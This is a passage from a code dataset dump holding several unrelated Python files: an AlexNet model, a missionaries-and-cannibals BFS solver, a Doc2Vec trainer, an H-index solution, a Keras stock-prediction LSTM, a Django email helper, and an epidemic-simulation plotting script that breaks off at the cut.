nn.MaxPool2d(kernel_size=3, stride=2), # output[256, 13, 13]\n nn.Conv2d(256, 384, kernel_size=3,stride=1, padding=1), # output[384, 13, 13]\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 384, 
kernel_size=3,stride=1,padding=1),  # output[384, 13, 13]\n            nn.ReLU(inplace=True),\n            nn.Conv2d(384, 256, kernel_size=3,stride=1, padding=1),  # output[256, 13, 13]\n            nn.ReLU(inplace=True),\n            nn.MaxPool2d(kernel_size=3, stride=2),  # output[256, 6, 6]\n        )\n        # Definition of the fully connected layers\n        self.classifier = nn.Sequential(\n            # p=0.5 is the fraction of neurons randomly dropped (deactivated)\n            nn.Dropout(p=0.5),\n            nn.Linear(256 * 6 * 6, 4096),\n            nn.ReLU(inplace=True),\n            nn.Dropout(p=0.5),\n            nn.Linear(4096, 4096),\n            nn.ReLU(inplace=True),\n            nn.Linear(4096, num_classes),\n        )\n        # whether to initialize the weights\n        if init_weights:\n            # call the weight-initialization function\n            self._initialize_weights()\n    # Forward pass of the AlexNet network\n    def forward(self, x):\n        # convolutional layers\n        x = self.features(x)\n        # flatten the features, then feed them to the fully connected layers\n        '''\n        Suppose a torch.Tensor t has shape (2,4,3,5,6); then torch.flatten(t, 1, 3).shape\n        is (2, 60, 6): the dimensions from start_dim to end_dim (inclusive) are multiplied\n        together and the rest are left unchanged. With the defaults start_dim=0, end_dim=-1,\n        torch.flatten(t) returns a one-dimensional tensor.\n        '''\n        x = torch.flatten(x, start_dim=1)\n        # feed the flattened features into the fully connected layers\n        x = self.classifier(x)\n        return x\n    # Weight-initialization function\n    def _initialize_weights(self):\n        # self.modules() is an iterator;\n        # this for loop iterates over the modules of the model\n        for m in self.modules():\n            # check whether the module is a convolutional layer\n            if isinstance(m, nn.Conv2d):\n                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n                # if the bias term is not None\n                if m.bias is not None:\n                    # initialize m.bias to 0\n                    nn.init.constant_(m.bias, 0)\n            # check whether the module is a fully connected layer\n            elif isinstance(m, nn.Linear):\n                # initialize the weights from a normal distribution\n                nn.init.normal_(m.weight, 0, 0.01)\n                # initialize m.bias to 0\n                nn.init.constant_(m.bias, 0)\n","sub_path":"alexnet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"498003404","text":"''' I had played a simulation on http://www.plastelina.net/ to try to figure out the\nmissionary cannibal solution. I got to this solution when playing\n\n1.One cannibal and one monk rowed across the river, one cannibal stayed and one monk rowed back \n2.Took the monk out, took two cannibals across, dropped the cannibal off, cannibal rowed back. \n3.Took the cannibal out, two monks got in, dropped off one monk, and cannibal and monk rowed back. \n4.Cannibal gets out, two monks get in, two monks get out, cannibal gets in. 
","sub_path":"alexnet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"498003404","text":"''' I had played a simulation on http://www.plastelina.net/ to try to figure out the\nmissionary-cannibal solution. I got to this solution when playing:\n\n1. One cannibal and one monk rowed across the river; one cannibal stayed and one monk rowed back.\n2. Took the monk out, took two cannibals across, dropped one cannibal off, and one cannibal rowed back.\n3. Took the cannibal out, two monks got in, dropped off one monk, and a cannibal and a monk rowed back.\n4. Cannibal gets out, two monks get in, two monks get out, cannibal gets in.\n5. Cannibal goes to get one cannibal, drops off one cannibal.\n6. Cannibal goes to get another cannibal, drops off two cannibals.'''\n\n\nclass State():\n\tdef __init__(self, cannibalLeft, missionaryLeft, boat, cannibalRight, missionaryRight):\n\t\tself.cannibalLeft = cannibalLeft\n\t\tself.missionaryLeft = missionaryLeft\n\t\tself.boat = boat\n\t\tself.cannibalRight = cannibalRight\n\t\tself.missionaryRight = missionaryRight\n\t\tself.parent = None\n\n\tdef isGoal(self):\n\t\tif self.cannibalLeft == 0 and self.missionaryLeft == 0:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef isValid(self):\n\t\tif self.missionaryLeft >= 0 and self.missionaryRight >= 0 \\\n                   and self.cannibalLeft >= 0 and self.cannibalRight >= 0 \\\n                   and (self.missionaryLeft == 0 or self.missionaryLeft >= self.cannibalLeft) \\\n                   and (self.missionaryRight == 0 or self.missionaryRight >= self.cannibalRight):\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef __eq__(self, other):\n\t\treturn self.cannibalLeft == other.cannibalLeft and self.missionaryLeft == other.missionaryLeft \\\n                   and self.boat == other.boat and self.cannibalRight == other.cannibalRight \\\n                   and self.missionaryRight == other.missionaryRight\n\n\tdef __hash__(self):\n\t\treturn hash((self.cannibalLeft, self.missionaryLeft, self.boat, self.cannibalRight, self.missionaryRight))\n\ndef successors(cur_state):\n\tchildren = []\n\tif cur_state.boat == 'left':\n\t\tnewState = State(cur_state.cannibalLeft, cur_state.missionaryLeft - 2, 'right',\n                                 cur_state.cannibalRight, cur_state.missionaryRight + 2)\n\t\t## Two missionaries cross left to right.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\t\tnewState = State(cur_state.cannibalLeft, cur_state.missionaryLeft - 1, 'right',\n                                 cur_state.cannibalRight, cur_state.missionaryRight + 1)\n\t\t## One missionary crosses left to right.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\t\tnewState = State(cur_state.cannibalLeft - 2, cur_state.missionaryLeft, 'right',\n                                 cur_state.cannibalRight + 2, cur_state.missionaryRight)\n\t\t## Two cannibals cross left to right.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\t\tnewState = State(cur_state.cannibalLeft - 1, cur_state.missionaryLeft - 1, 'right',\n                                 cur_state.cannibalRight + 1, cur_state.missionaryRight + 1)\n\t\t## One missionary and one cannibal cross left to right.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\t\tnewState = State(cur_state.cannibalLeft - 1, cur_state.missionaryLeft, 'right',\n                                 cur_state.cannibalRight + 1, cur_state.missionaryRight)\n\t\t## One cannibal crosses left to right.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\telse:\n\t\tnewState = State(cur_state.cannibalLeft, cur_state.missionaryLeft + 2, 'left',\n                                 cur_state.cannibalRight, cur_state.missionaryRight - 2)\n\t\t## Two missionaries cross right to left.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\t\tnewState = State(cur_state.cannibalLeft + 2, cur_state.missionaryLeft, 'left',\n                                 cur_state.cannibalRight - 2, cur_state.missionaryRight)\n\t\t## Two cannibals cross right to left.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\t\tnewState = State(cur_state.cannibalLeft + 1, cur_state.missionaryLeft + 1, 'left',\n                                 cur_state.cannibalRight - 1, cur_state.missionaryRight - 1)\n\t\t## One missionary and one cannibal cross right to left.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\t\tnewState = State(cur_state.cannibalLeft, cur_state.missionaryLeft + 1, 'left',\n                                 cur_state.cannibalRight, cur_state.missionaryRight - 1)\n\t\t## One missionary crosses right to left.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\t\tnewState = State(cur_state.cannibalLeft + 1, cur_state.missionaryLeft, 'left',\n                                 cur_state.cannibalRight - 1, cur_state.missionaryRight)\n\t\t## One cannibal crosses right to left.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\treturn children\n
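\n# Editor's note (an illustrative sketch, not part of the original script): the BFS\n# below pops from the front of a list, which is O(n); collections.deque gives an\n# O(1) popleft() with the same FIFO behavior.\nfrom collections import deque\n_sketch_frontier = deque([State(3, 3, 'left', 0, 0)])\n_sketch_state = _sketch_frontier.popleft()  # O(1), unlike list.pop(0)\n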
\ndef BFS():\n\tinitialState = State(3,3,'left',0,0)\n\tif initialState.isGoal():\n\t\treturn initialState\n\tfrontier = list()\n\texplored = set()\n\tfrontier.append(initialState)\n\twhile frontier:\n\t\tstate = frontier.pop(0)\n\t\tif state.isGoal():\n\t\t\treturn state\n\t\texplored.add(state)\n\t\tchildren = successors(state)\n\t\tfor child in children:\n\t\t\tif (child not in explored) and (child not in frontier):\n\t\t\t\tfrontier.append(child)\n\treturn None\n\ndef printSolution(solution):\n\tpath = []\n\tpath.append(solution)\n\tparent = solution.parent\n\twhile parent:\n\t\tpath.append(parent)\n\t\tparent = parent.parent\n\n\tfor t in range(len(path)):\n\t\tstate = path[len(path) - t - 1]\n\t\tprint (\"(\"+ str(state.cannibalLeft) + \",\" + str(state.missionaryLeft) + \",\" + state.boat + \",\" + str(state.cannibalRight) + \",\" + str(state.missionaryRight)+ \")\")\n\ndef main():\n\tsolution = BFS()\n\tprint (\"CannibalLeft, MissionaryLeft, Boat, CannibalRight, MissionaryRight\")\n\tprintSolution(solution)\n\n\nmain()","sub_path":"MissonaryAndCannibals.py","file_name":"MissonaryAndCannibals.py","file_ext":"py","file_size_in_byte":5946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"10137285","text":"import os\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\nfrom nltk.tokenize import word_tokenize\n\n\nfrom medical_transcrition_nlp.train_word_vec import train_word_vec\nfrom medical_transcrition_nlp.Constants.DocConstants import MAXEPOCHS,VECSIZE,ALPHA,MINCOUNT,MINALPHA,FILENAME\n\nclass train_doc_vec(train_word_vec):\n\n    def applytocol(self):\n        pass\n\n    def train(self):\n        tagged_data = [TaggedDocument(words=word_tokenize(_d.lower()), tags=[str(i)]) for i, _d in\n                       enumerate(self.dataset['transcription'])]\n\n        self.model = Doc2Vec(vector_size=VECSIZE,\n                             alpha=ALPHA,\n                             min_alpha=MINALPHA,\n                             min_count=MINCOUNT,\n                             dm=1, epochs=MAXEPOCHS)\n\n        self.model.build_vocab(tagged_data)\n        self.model.train(tagged_data,\n                         total_examples=self.model.corpus_count, epochs=self.model.epochs)\n\n    def save_model(self):\n        if not os.path.exists('data'):\n            os.mkdir('data')\n        self.model.save(os.path.join('data', FILENAME))\n\n    def load_model(self, filename):\n        self.pretrained_model = Doc2Vec.load(os.path.join('data', filename))\n
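\n    # Editor's illustrative sketch (not part of the original class): once a model\n    # has been loaded with load_model(), a vector can be inferred for an unseen\n    # transcription; 'text' is any raw string.\n    def infer(self, text):\n        return self.pretrained_model.infer_vector(word_tokenize(text.lower()))\n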
","sub_path":"medical_transcrition_nlp/train_doc_vec.py","file_name":"train_doc_vec.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"16756397","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\nFollow up for H-Index: What if the citations array is sorted in ascending order?\nCould you optimize your algorithm?\n\nHint:\n\nExpected runtime complexity is in O(log n) and the input is sorted.\n\"\"\"\n\nclass Solution(object):\n    def hIndex(self, citations):\n        \"\"\"\n        :type citations: List[int]\n        :rtype: int\n        \"\"\"\n        if not citations:\n            return 0\n        i, j = 0, len(citations)\n        while i < j:\n            mid = (i + j) // 2\n            if citations[mid] >= len(citations) - mid:\n                j = mid\n            else:\n                i = mid + 1\n        return len(citations) - j\n","sub_path":"Python/275-H-index2/hIndex.py","file_name":"hIndex.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"142446317","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom keras.datasets import stock_one\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, TimeDistributedDense, Dropout, Activation, Merge\nfrom keras.regularizers import l2, l1\nfrom keras.constraints import maxnorm\nfrom keras.optimizers import SGD, Adam, RMSprop\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers.recurrent import LSTM, GRU\nfrom keras.utils import np_utils\nfrom keras.objectives import to_categorical, categorical_crossentropy\nimport numpy as np\n\nbatch_size = 128\nnb_epoch = 1000\nnorm = 'minmax'\nhidden_units = 256\n#maxlen = 100\nstep = 50\ntrain_days = 2000/step\ntest_days = 1000/step\nnb_sample = 100\ntg=-1\n#train_split = 0.8\nstock_num = 'pkl_tables/600674'\n\n#np.random.seed(1337)  # for reproducibility\n\ndef load_data(sz, maxlen, stock_num, norm, step):\n    # the data, shuffled and split between train and test sets\n    (X, Y, mins, maxs) = stock_one.load_data('/home/zhaowuxia/dl_tools/datasets/stock/%s.pkl'%(stock_num), norm = norm, sz = sz, maxlen = None, step = step, reverse=True ) \n    print(X.shape, Y.shape, mins.shape, maxs.shape)\n\n    sz = X.shape[0]\n    maxlen = min(maxlen, X.shape[1])\n\n    X = X[:, -maxlen:, 3].reshape(sz, maxlen, 1)\n    Y = np.concatenate((X[:, 1:, :], Y[:, 3].reshape(sz, 1, 1)), axis=1)\n    mins = mins[:, 3]\n    maxs = maxs[:, 3]\n    return (X, Y, mins, maxs)\n\ndef build_model():\n    model = Sequential()\n    model.add(LSTM(input_dim=1, output_dim=hidden_units,init='glorot_normal', return_sequences=True,truncate_gradient=tg))\n    #model.add(Dropout(0.5))\n    model.add(TimeDistributedDense(hidden_units, 1))\n    #model.add(Activation('relu'))\n\n    #sgd=SGD(lr=1e-3, momentum=0.95, nesterov=True, clipnorm=5.0)\n    #rms = RMSprop(clipnorm=5.0)\n    model.compile(loss='mae', optimizer='adam')\n    return model\n\ndef write_csv(save_path, gnd, pred):\n    # gnd: [T, 1]\n    # pred: [T, 1]\n    T = pred.shape[0]\n    with open(save_path, 'w') as f:\n        f.write('pred,gnd\\n')\n        for i in range(T):\n            if i >= len(gnd):\n                f.write('%.4f,0,\\n'%pred[i])\n            else:\n                f.write('%.4f,%.4f,\\n'%(pred[i], gnd[i]))\n\ndef recurrent_predict(model, x_history, pred_step, return_sequences=True):\n    # x_history : [nb_sample, T, 1]\n    # pred_step : int\n    print('Predicting...')\n    print(x_history.shape, pred_step)\n    T = x_history.shape[1]\n    nb_samples = x_history.shape[0]\n    x = np.zeros([nb_samples, T+pred_step, 1])\n    x[:, :T] = x_history\n    y = []\n    for i in range(pred_step):\n        if i > 0 and i % 100 == 0:\n            print('%d steps finished'%i)\n        y=model.predict(x[:, :T+i, :], verbose=0)\n        if return_sequences:\n            x[:, T+i, :] = y[:, T+i-1, :]\n        else:\n            x[:, T+i, :] = y.reshape(x[:, T+i, :].shape)\n    if return_sequences:\n        x[:, 1:T, :] = y[:, :T-1, :]\n    print('Finish predicting')\n    return x\n\ndef 
compute_loss(gnd, pred, verbose=False):\n error = np.fabs(gnd-pred)/gnd\n mean_error = error.mean(error.ndim-2)\n if verbose:\n for i in mean_error:\n print('%.4f'%i)\n return mean_error\n\nif __name__=='__main__':\n (X, Y, mins, maxs) = load_data(nb_sample, train_days+test_days, stock_num, norm, step)\n X_train = X[:, :train_days]\n y_train = X[:, :train_days]\n X_test = X[:, :train_days+test_days/2]\n y_test = Y[:, :train_days+test_days/2]\n print(X_train.shape, y_train.shape)\n print(X_test.shape, y_test.shape)\n print(mins.shape, maxs.shape)\n #write_csv('csv/test/%s_%d_%d.csv'%(stock_num.split('/')[-1], nb_sample, train_days+test_days), X[0], X[0])\n\n model = build_model()\n #model.load_weights('models/test/model_%s_%d_%d'%(stock_num.split('/')[-1], nb_sample, train_days))\n model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=1, validation_data=(X_test, y_test), save_path='models/test/model_%s_%d_%d'%(stock_num.split('/')[-1], nb_sample, train_days))\n model.save_weights('models/test/model_%s_%d_%d_final'%(stock_num.split('/')[-1], nb_sample, train_days), overwrite=True)\n model.load_weights('models/test/model_%s_%d_%d'%(stock_num.split('/')[-1], nb_sample, train_days))\n\n gnd = X.mean(0, keepdims=True)\n pred1 = recurrent_predict(model, gnd[:, :train_days], 2*test_days, return_sequences=True)\n write_csv('csv/test/output_%s_%d_%d_%d.csv'%(stock_num.split('/')[-1], nb_sample, train_days, 2*test_days), gnd[0], pred1[0])\n pred2 = recurrent_predict(model, gnd[:, :train_days/2], train_days/2 + test_days, return_sequences=True)\n write_csv('csv/test/output_%s_%d_%d_%d.csv'%(stock_num.split('/')[-1], nb_sample, train_days/2, train_days/2+2*test_days), gnd[0], pred2[0])\n\n pred = recurrent_predict(model, gnd[:, :train_days+test_days/2], test_days/2, return_sequences=True)\n pred = (pred[0]+1)/2*(maxs-mins)+mins\n gnd = (gnd[0]+1)/2*(maxs-mins)+mins\n for step in range(5, test_days/2+1, 5):\n error1 = compute_loss(gnd[train_days+test_days/2:train_days+test_days/2+step], pred[train_days+test_days/2:train_days+test_days/2+step])\n error2 = compute_loss(gnd[train_days+test_days/2:train_days+test_days/2+step], gnd[train_days+test_days/2-step:train_days+test_days/2])\n print('predict step = ', step, ': mean relative loss = ', error1, ', T-1 loss = ', error2)\n","sub_path":"examples/stock/train_one2.py","file_name":"train_one2.py","file_ext":"py","file_size_in_byte":5411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"288256646","text":"import os\nimport logging\n\nfrom django.conf import settings\n\nfrom utils.email import add_outgoing_email\n\nlogger = logging.getLogger(\"bornhack.%s\" % __name__)\n\ndef add_sponsorticket_email(ticket):\n # put formatdict together\n formatdict = {\n \"ticket\": ticket,\n }\n\n subject = \"%s %s Sponsor Ticket %s\" % (\n ticket.sponsor.camp.title,\n ticket.sponsor.name,\n ticket.uuid,\n )\n\n filename = \"sponsor_ticket_{}.pdf\".format(ticket.pk)\n with open(os.path.join(settings.PDF_ARCHIVE_PATH, filename), \"rb\") as f:\n # add email to outgoing email queue\n return add_outgoing_email(\n text_template=\"emails/sponsorticket_email.txt\",\n html_template=\"emails/sponsorticket_email.html\",\n to_recipients=ticket.sponsor.ticket_email,\n formatdict=formatdict,\n subject=subject,\n attachment=f.read(),\n attachment_filename=filename,\n 
)\n\n","sub_path":"src/sponsors/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"547239965","text":"# -*- coding: utf-8 -*-\n\nfrom ConstantsAndRandom import ConstantsAndRandom\nfrom SimulationEnvironment import SimulationEnvironment\nimport pickle\nimport time as tm\nimport cProfile\nimport pstats\nimport sys\nimport os\nimport matplotlib.pyplot as plt\nimport math\nfrom SimulationClass import SimulationClass\nfrom ConfidenceInterval import ConfidenceInterval\nimport csv\nimport numpy as np\n \ndef autolabel(rects):\n \"\"\"Attach a text label above each bar in *rects*, displaying its height.\"\"\"\n for rect in rects:\n height = rect.get_height()\n axs[plotCol].annotate('{:.1f}'.format(height),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3),\n textcoords=\"offset points\",\n ha='center', va='bottom', rotation=90)\n\nsys.setrecursionlimit(10000)\n\npath = \"finishedSimulationStatesConsolidated/\"\n\nfileNameList = os.listdir(path)\nsimulationEnvironmentList = []\nlegendList = []\n\ni = 0\n\n\nfor fileName in fileNameList:\n if fileName==\"_description.txt\" or fileName==\"other\" or fileName==\"figure_1.png\" or fileName==\"figure_2.png\" or fileName==\"figure_3.png\" or fileName==\"figure_3b.png\" or fileName==\"figure_3c.png\" or fileName==\"figure_3d.png\" or fileName==\"figure_3e.png\" or fileName==\"figure_4.png\" or fileName==\"result_file.csv\":\n continue\n se = pickle.load( open( path+fileName, \"rb\" ) )\n simulationEnvironmentList.append(se)\n\nMain_populationSize = 10000\n\nresultValuesPandemicDuration = {}\nresultValuesPandemicDurationCI = {}\nresultValuesQuarantineTime = {}\nresultValuesQuarantineTimeCI = {}\nresultValuesShareSusceptibleAtEnd = {}\nresultValuesShareSusceptibleAtEndCI = {}\nresultValuesQuotient = {}\nresultValuesQuotientCI = {}\nresultValuesShareQuarantineTimeSusceptible = {}\nresultValuesQuarantineTimeSusceptible = {}\nresultValuesQuarantineTimeSusceptibleCI = {}\n\nfor simulationEnvironment in simulationEnvironmentList:\n adoption = simulationEnvironment.contactTracingAdoptionPercentage\n valuePandemicDuration = simulationEnvironment.ci_timeOfPandemic.mean\n valuePandemicDurationCI = simulationEnvironment.ci_timeOfPandemic.halfInterval\n valueQuarantineTime = simulationEnvironment.ci_averageTimeOfQuarantinePerPerson.mean\n valueQuarantineTimeCI = simulationEnvironment.ci_averageTimeOfQuarantinePerPerson.halfInterval\n valueShareSusceptibleAtEnd = 100 * simulationEnvironment.ci_shareOfSusceptiblePeopleAtTheEnd.mean\n valueShareSusceptibleAtEndCI = 100 * simulationEnvironment.ci_shareOfSusceptiblePeopleAtTheEnd.halfInterval\n valueQuotient = 100 * simulationEnvironment.ci_quotient.mean\n valueQuotientCI = 100 * simulationEnvironment.ci_quotient.halfInterval\n valueShareQuarantineTimeSusceptible = 100 * simulationEnvironment.ci_shareDaysSpentInQuarantineOfPeopleSusceptibleByTotalQuarantineDays.mean\n valueQuarantineTimeSusceptible = simulationEnvironment.ci_totalDaysSpentInQuarantineOfPeopleSusceptible.mean / 10000\n valueQuarantineTimeSusceptibleCI = simulationEnvironment.ci_totalDaysSpentInQuarantineOfPeopleSusceptible.halfInterval / 10000\n a = 0\n\n if(simulationEnvironment.contactTracingOn == False):\n adoption = 0\n\n if(simulationEnvironment.firstID% 46 < 26):\n resultValuesPandemicDuration.setdefault(adoption, []).append(valuePandemicDuration)\n resultValuesPandemicDurationCI.setdefault(adoption, 
[]).append(valuePandemicDurationCI)\n resultValuesQuarantineTime.setdefault(adoption, []).append(valueQuarantineTime)\n resultValuesQuarantineTimeCI.setdefault(adoption, []).append(valueQuarantineTimeCI)\n resultValuesShareSusceptibleAtEnd.setdefault(adoption, []).append(valueShareSusceptibleAtEnd)\n resultValuesShareSusceptibleAtEndCI.setdefault(adoption, []).append(valueShareSusceptibleAtEndCI)\n resultValuesQuotient.setdefault(adoption, []).append(valueQuotient)\n resultValuesQuotientCI.setdefault(adoption, []).append(valueQuotientCI)\n resultValuesShareQuarantineTimeSusceptible.setdefault(adoption, []).append(valueShareQuarantineTimeSusceptible)\n resultValuesQuarantineTimeSusceptible.setdefault(adoption, []).append(valueQuarantineTimeSusceptible)\n resultValuesQuarantineTimeSusceptibleCI.setdefault(adoption, []).append(valueQuarantineTimeSusceptibleCI)\n \ndataPandemicDuration = [resultValuesPandemicDuration[20], resultValuesPandemicDuration[40], resultValuesPandemicDuration[60], resultValuesPandemicDuration[80], resultValuesPandemicDuration[100]]\ndataPandemicDurationCI = [resultValuesPandemicDurationCI[20], resultValuesPandemicDurationCI[40], resultValuesPandemicDurationCI[60], resultValuesPandemicDurationCI[80], resultValuesPandemicDurationCI[100]]\ndataQuarantineTime = [resultValuesQuarantineTime[20], resultValuesQuarantineTime[40], resultValuesQuarantineTime[60], resultValuesQuarantineTime[80], resultValuesQuarantineTime[100]]\ndataQuarantineTimeCI = [resultValuesQuarantineTimeCI[20], resultValuesQuarantineTimeCI[40], resultValuesQuarantineTimeCI[60], resultValuesQuarantineTimeCI[80], resultValuesQuarantineTimeCI[100]]\ndataShareSusceptibleAtEnd = [resultValuesShareSusceptibleAtEnd[20], resultValuesShareSusceptibleAtEnd[40], resultValuesShareSusceptibleAtEnd[60], resultValuesShareSusceptibleAtEnd[80], resultValuesShareSusceptibleAtEnd[100]]\ndataShareSusceptibleAtEndCI = [resultValuesShareSusceptibleAtEndCI[20], resultValuesShareSusceptibleAtEndCI[40], resultValuesShareSusceptibleAtEndCI[60], resultValuesShareSusceptibleAtEndCI[80], resultValuesShareSusceptibleAtEndCI[100]]\ndataQuotient = [resultValuesQuotient[20], resultValuesQuotient[40], resultValuesQuotient[60], resultValuesQuotient[80], resultValuesQuotient[100]]\ndataQuotientCI = [resultValuesQuotientCI[20], resultValuesQuotientCI[40], resultValuesQuotientCI[60], resultValuesQuotientCI[80], resultValuesQuotientCI[100]]\ndataShareQuarantineTimeSusceptible = [resultValuesShareQuarantineTimeSusceptible[20], resultValuesShareQuarantineTimeSusceptible[40], resultValuesShareQuarantineTimeSusceptible[60], resultValuesShareQuarantineTimeSusceptible[80], resultValuesShareQuarantineTimeSusceptible[100]]\ndataQuarantineTimeSusceptible = [resultValuesQuarantineTimeSusceptible[20], resultValuesQuarantineTimeSusceptible[40], resultValuesQuarantineTimeSusceptible[60], resultValuesQuarantineTimeSusceptible[80], resultValuesQuarantineTimeSusceptible[100]]\ndataQuarantineTimeSusceptibleCI = [resultValuesQuarantineTimeSusceptibleCI[20], resultValuesQuarantineTimeSusceptibleCI[40], resultValuesQuarantineTimeSusceptibleCI[60], resultValuesQuarantineTimeSusceptibleCI[80], resultValuesQuarantineTimeSusceptibleCI[100]]\n\nrows = 1\ncols = 3\nnumberOfPlotsPerSubsection = 5\n\nMain_populationSize = 10000\n\nfig, axs = plt.subplots(rows, cols, figsize=(15,6))\n\nfor simulationEnvironment in simulationEnvironmentList:\n shareList = [100 * x / Main_populationSize for x in simulationEnvironment.averageNumberOfPeopleInfectious]\n\nX = 
np.linspace(0,2.5,num=5)\nbar_width = 0.1\nbar_group_distance = 0.11\ncolorsBase = ['#dd4d4d', '#d6834f', '#eba639', '#87aa66', '#006400']\ncolorsLight = ['#E67E7E', '#E1A57F', '#F0BE6F', '#A8C190', '#468E46']\n\n[plotRow, plotCol] = [0, 0]\na0=axs[plotCol].bar(-0.15, resultValuesPandemicDuration[0], color = '#000000', width = bar_width, yerr=resultValuesPandemicDurationCI[0], capsize=4)\na1=axs[plotCol].bar(X + 0, dataPandemicDuration[0], color = colorsBase[0], width = bar_width, yerr=dataPandemicDurationCI[0], capsize=4)\na2=axs[plotCol].bar(X + bar_group_distance, dataPandemicDuration[1], color = colorsBase[1], width = bar_width, yerr=dataPandemicDurationCI[1], capsize=4)\na3=axs[plotCol].bar(X + 2 * bar_group_distance, dataPandemicDuration[2], color = colorsBase[2], width = bar_width, yerr=dataPandemicDurationCI[2], capsize=4)\na4=axs[plotCol].bar(X + 3 * bar_group_distance, dataPandemicDuration[3], color = colorsBase[3], width = bar_width, yerr=dataPandemicDurationCI[3], capsize=4)\na5=axs[plotCol].bar(X + 4 * bar_group_distance, dataPandemicDuration[4], color = colorsBase[4], width = bar_width, yerr=dataPandemicDurationCI[4], capsize=4)\n\naxs[plotCol].set_title(\"A Duration of the epidemic\")\naxs[plotCol].set_xlabel(\"Proximity detection range\")\naxs[plotCol].set_ylabel(\"Duration of the epidemic, average and 90% CI [days]\")\naxs[plotCol].set_xticks(X + 2 * bar_group_distance)\naxs[plotCol].set_xticklabels([\"0.2 m\",\"1 m\",\"2 m\",\"10 m\",\"Site-wide\"])\naxs[plotCol].legend(labels=['No CT', '20% adoption', '40% adoption', '60% adoption', '80% adoption', '100% adoption'], loc='upper left')\n\n[plotRow, plotCol] = [0, 1]\na0=axs[plotCol].bar(-0.15, resultValuesShareSusceptibleAtEnd[0], color = '#000000', width = bar_width, yerr=resultValuesShareSusceptibleAtEndCI[0], capsize=4)\na1=axs[plotCol].bar(X + 0, dataShareSusceptibleAtEnd[0], color = colorsBase[0], width = bar_width, yerr=dataShareSusceptibleAtEndCI[0], capsize=4)\na2=axs[plotCol].bar(X + bar_group_distance, dataShareSusceptibleAtEnd[1], color = colorsBase[1], width = bar_width, yerr=dataShareSusceptibleAtEndCI[1], capsize=4)\na3=axs[plotCol].bar(X + 2 * bar_group_distance, dataShareSusceptibleAtEnd[2], color = colorsBase[2], width = bar_width, yerr=dataShareSusceptibleAtEndCI[2], capsize=4)\na4=axs[plotCol].bar(X + 3 * bar_group_distance, dataShareSusceptibleAtEnd[3], color = colorsBase[3], width = bar_width, yerr=dataShareSusceptibleAtEndCI[3], capsize=4)\na5=axs[plotCol].bar(X + 4 * bar_group_distance, dataShareSusceptibleAtEnd[4], color = colorsBase[4], width = bar_width, yerr=dataShareSusceptibleAtEndCI[4], capsize=4)\n\naxs[plotCol].set_title(\"B Susceptible individuals at the end\")\naxs[plotCol].set_xlabel(\"Proximity detection range\")\naxs[plotCol].set_ylabel(\"Share of susceptible individuals at the end, average and 90% CI [%]\")\naxs[plotCol].set_xticks(X + 2 * bar_group_distance)\naxs[plotCol].set_xticklabels([\"0.2 m\",\"1 m\",\"2 m\",\"10 m\",\"Site-wide\"])\naxs[plotCol].legend(labels=['No CT', '20% adoption', '40% adoption', '60% adoption', '80% adoption', '100% adoption'], loc='upper left')\n\n[plotRow, plotCol] = [0, 2]\n\na0=axs[plotCol].bar(-0.15, resultValuesQuarantineTime[0], color = '#000000', width = bar_width, yerr=resultValuesQuarantineTimeCI[0], capsize=4)\na1=axs[plotCol].bar(X + 0, np.array(dataQuarantineTime[0]) - np.array(dataQuarantineTimeSusceptible[0]), bottom=dataQuarantineTimeSusceptible[0], color = colorsBase[0], width = bar_width, yerr=dataQuarantineTimeCI[0], 
